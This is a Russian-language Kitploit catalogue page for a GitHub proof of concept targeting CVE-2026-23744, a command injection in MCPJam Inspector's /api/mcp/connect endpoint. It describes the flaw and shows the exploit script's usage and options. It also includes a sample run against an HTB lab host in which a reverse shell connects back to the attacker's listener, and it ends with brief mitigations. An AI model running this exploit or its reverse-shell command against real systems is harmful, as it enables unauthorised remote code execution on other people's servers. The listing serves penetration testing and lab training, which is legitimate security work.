Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 — это неаутентифицированная инъекция команд в MCPJam Inspector ≤1.4.2 через /api/mcp/connect. Этот POC эксплуатирует её путём отправки специально сформированной JSON-полезной нагрузки для выполнения произвольных команд, предоставляя обратную оболочку (reverse shell) с PTY. | Kitploit
Инструменты/GitHubGitHub/mluex0/cve-2026-23744-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

Репозиторий
229 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-23744 — это неаутентифицированная инъекция команд в MCPJam Inspector ≤1.4.2 через /api/mcp/connect. Этот POC эксплуатирует её путём отправки специально сформированной JSON-полезной нагрузки для выполнения произвольных команд, предоставляя обратную оболочку (reverse shell) с PTY.

Поделиться

CVE-2026-23744-PoC

Дисклеймер:

Данный proof-of-concept предоставляется исключительно для авторизованных исследований в области безопасности, образовательных целей и контролируемых лабораторных сред (например, HTB, CTF или внутреннего тестирования на проникновение с явным письменным согласием). Несанкционированное использование против любой системы без разрешения является незаконным и неэтичным. Автор не несёт ответственности за неправомерное использование; пользователи несут единоличную ответственность за соблюдение всех применимых законов и нормативных требований.


Описание

CVE-2026-23744 — это уязвимость внедрения команд без аутентификации в MCPJam Inspector (версия ≤ 1.4.2).
Эндпоинт /api/mcp/connect принимает JSON-полезную нагрузку с serverConfig.command и serverConfig.args и передаёт их напрямую функции запуска системного процесса без какой-либо санитизации. Злоумышленник может отправить специально сформированный запрос для выполнения произвольных системных команд, получив reverse shell с привилегиями пользователя службы.

Этот репозиторий содержит полностью рабочий эксплойт-скрипт с опциональным автоматическим интерактивным слушателем на основе PTY (включён по умолчанию).


Требования

  • Python 3.6+
  • библиотека requests (pip install requests)

Использование

Важно: Указывайте только имя хоста или IP-адрес. Скрипт автоматически добавляет http:// или https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
ПараметрОписание
-t, --targetИмя хоста или IP-адрес цели (обязательно)
-p, --portПорт цели (по умолчанию: 6274)
-l, --lhostВаш IP-адрес для reverse shell (обязательно)
-r, --lportПорт вашего слушателя (по умолчанию: 4444)
--sslИспользовать HTTPS вместо HTTP
--check-onlyТолько проверить уязвимость, не отправлять shell

Пример

Скрипт запускает собственный слушатель и предоставляет вам shell прямо в вашем терминале.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Доказательство концепции (успешный запуск)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Меры по снижению риска

  • Санитизируйте все пользовательские аргументы, передаваемые функциям запуска процессов.
  • Не допускайте произвольного выполнения команд через API-эндпоинты без строгого применения белых списков и аутентификации.
  • Запускайте службы с минимальными привилегиями — никогда от имени root.

Лицензия

Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования. Используйте на свой страх и риск.

Автор: Mluex0 Дата: август 2026

Скачать инструмент